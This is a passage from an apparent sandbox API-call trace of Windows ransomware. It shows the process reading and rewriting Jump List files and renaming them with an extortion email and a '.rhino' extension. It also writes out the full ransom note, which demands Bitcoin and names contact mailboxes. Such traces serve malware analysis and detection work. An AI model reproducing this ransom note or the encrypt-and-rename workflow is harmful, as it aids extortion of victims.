hHeap=0x6d0000) returned 1 [0090.541] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760b98 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd80 | out: hHeap=0x6d0000) returned 1 [0090.541] WriteFile (in: hFile=0x104, lpBuffer=0x760ba0*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x760ba0*, lpNumberOfBytesWritten=0x2cfa04*=0xf20, lpOverlapped=0x0) returned 1 [0090.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760b98 | out: hHeap=0x6d0000) returned 1 [0090.541] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf20, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.542] CloseHandle (hObject=0x104) returned 1 [0090.544] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0048 [0090.544] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0408 [0090.544] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.544] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0408 | out: hHeap=0x6d0000) returned 1 [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0280 | out: hHeap=0x6d0000) returned 1 [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.548] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b8 | out: hHeap=0x6d0000) returned 1 [0090.548] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.548] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.548] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.551] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x18 [0090.551] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x138, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.551] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.552] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x18, lpOverlapped=0x0) returned 1 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.554] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.554] GetLastError () returned 0x0 [0090.554] SetLastError (dwErrCode=0x0) [0090.554] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0090.554] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0110 [0090.554] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0218 [0090.554] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.554] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709ec8 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ec8 | out: hHeap=0x6d0000) returned 1 [0090.555] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x23b03a0 [0090.555] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.555] WriteFile (in: hFile=0x104, lpBuffer=0x23b03a0*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b03a0*, lpNumberOfBytesWritten=0x2cfa04*=0x138, lpOverlapped=0x0) returned 1 [0090.556] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.556] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x138, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.556] CloseHandle (hObject=0x104) returned 1 [0090.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b03a0 [0090.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b04b8 [0090.561] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04b8 | out: hHeap=0x6d0000) returned 1 [0090.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0218 | out: hHeap=0x6d0000) returned 1 [0090.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.563] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.563] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.563] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.565] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0090.565] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0090.567] CloseHandle (hObject=0x104) returned 1 [0090.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.568] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1f68 [0090.568] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2088, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.568] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.569] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.571] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.572] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1f68, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1f68, lpOverlapped=0x0) returned 1 [0090.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.573] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.573] GetLastError () returned 0x0 [0090.573] SetLastError (dwErrCode=0x0) [0090.573] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1f8b) returned 0x75ef78 [0090.573] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01d8 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02e0 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.574] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.574] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01d8 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0468 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b05b0 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.575] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0798 [0090.575] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05b0 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0a68 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0798 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x760f10 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0a68 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0468 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f10 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760f10 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x761d28 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f10 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x763268 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761d28 | out: hHeap=0x6d0000) returned 1 [0090.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x765230 [0090.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763268 | out: hHeap=0x6d0000) returned 1 [0090.683] WriteFile (in: hFile=0x104, lpBuffer=0x765240*, nNumberOfBytesToWrite=0x2088, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x765240*, lpNumberOfBytesWritten=0x2cfa04*=0x2088, lpOverlapped=0x0) returned 1 [0090.684] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765230 | out: hHeap=0x6d0000) returned 1 [0090.685] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2088, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.685] CloseHandle (hObject=0x104) returned 1 [0090.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0468 [0090.690] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0580 [0090.691] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.691] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\590aee7bdd69b59b.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0580 | out: hHeap=0x6d0000) returned 1 [0090.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02e0 | out: hHeap=0x6d0000) returned 1 [0090.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.693] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.694] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.695] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x43a3 [0090.695] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x44c3, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.695] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.695] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.698] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.699] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x43a3, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x43a3, lpOverlapped=0x0) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.700] GetLastError () returned 0x0 [0090.700] SetLastError (dwErrCode=0x0) [0090.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x43c6) returned 0x75ef78 [0090.701] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0110 [0090.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0218 [0090.701] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.701] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.701] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.702] 